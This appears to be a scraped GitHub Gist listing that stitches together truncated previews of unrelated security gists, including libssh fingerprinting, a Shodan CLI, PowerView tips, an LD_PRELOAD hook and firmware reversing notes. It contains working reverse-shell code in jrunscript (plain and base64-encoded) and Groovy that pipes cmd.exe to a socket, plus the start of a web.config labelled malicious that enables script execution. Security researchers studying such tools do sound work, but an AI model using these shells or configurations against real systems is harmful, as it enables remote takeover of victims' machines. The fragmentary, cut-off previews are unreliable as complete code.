Decidedly Gray decidedlygray
@0x4D31
0x4D31 / libssh_server_fingerprints.md
Last active Sep 6, 2019
[libssh server fingerprints] An analysis of Censys Public Scan 20180807 (only port 22) to estimate the number of servers {potentially} vulnerable to the recent Libssh bug #libssh #hassh
View libssh_server_fingerprints.md
@gazcbm
gazcbm / downloader web.config
Created Jul 11, 2018
Malicious web.config's
View downloader web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
@dirtyak
dirtyak / shodan_cli.py
Last active Sep 11, 2019
Simple shodan command line in python
View shodan_cli.py
#!/usr/bin/env python
import shodan
import os
import sys
import subprocess
from termcolor import cprint
from pyfiglet import figlet_format
######################################################
SHODAN_API_KEY = "ENTER_YOUR_API_KEY_HERE"
@apsun
apsun / hax.c
Last active Aug 29, 2019
Hook main() using LD_PRELOAD
View hax.c
/*
* Hook main() using LD_PRELOAD, because why not?
* Obviously, this code is not portable. Use at your own risk.
*
* Compile using 'gcc hax.c -o hax.so -fPIC -shared -ldl'
* Then run your program as 'LD_PRELOAD=$PWD/hax.so ./a.out'
*/
#define _GNU_SOURCE
#include <stdio.h>
@mgeeky
mgeeky / openvas-automate.sh
Last active Sep 29, 2019
OpenVAS automation script.
View openvas-automate.sh
#!/bin/bash
#
# OpenVAS automation script.
# Mariusz B. / mgeeky, '17
# v0.2
#
trap ctrl_c INT
# --- CONFIGURATION ---
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active Oct 18, 2019
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@frohoff
frohoff / JVM_POST_EXPLOIT.md
Last active Oct 14, 2019
JVM Post-Exploitation One-Liners
View JVM_POST_EXPLOIT.md

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@clckwrkbdgr
clckwrkbdgr / pastebin.py
Created Mar 6, 2016
Using Pastebin as a free online data storage
View pastebin.py
import requests
import xml.etree.ElementTree as ET
import sys

class Pastebin:
    def __init__(self, api_key, user_key):
        self.api_key, self.user_key = api_key, user_key
        self.session = requests.session()

    def _post(self, option, data=None):
        data = data.copy() if data else {}
@frohoff
frohoff / revsh.groovy
Created Mar 2, 2016
Pure Groovy/Java Reverse Shell
View revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@serializingme
serializingme / Reversing Aruba Instant.md
Created Jan 23, 2016
Reversing Aruba Instant Firmware
View Reversing Aruba Instant.md

Aruba produces two different software loads for their Access Point hardware. The first is called ArubaOS and the second is called Aruba Instant. With ArubaOS, the AP requires a Mobility Controller (hardware) to be installed in the network. With Aruba Instant it is possible to run APs independently (standalone mode) or in a cluster, with no Mobility Controller in the network.
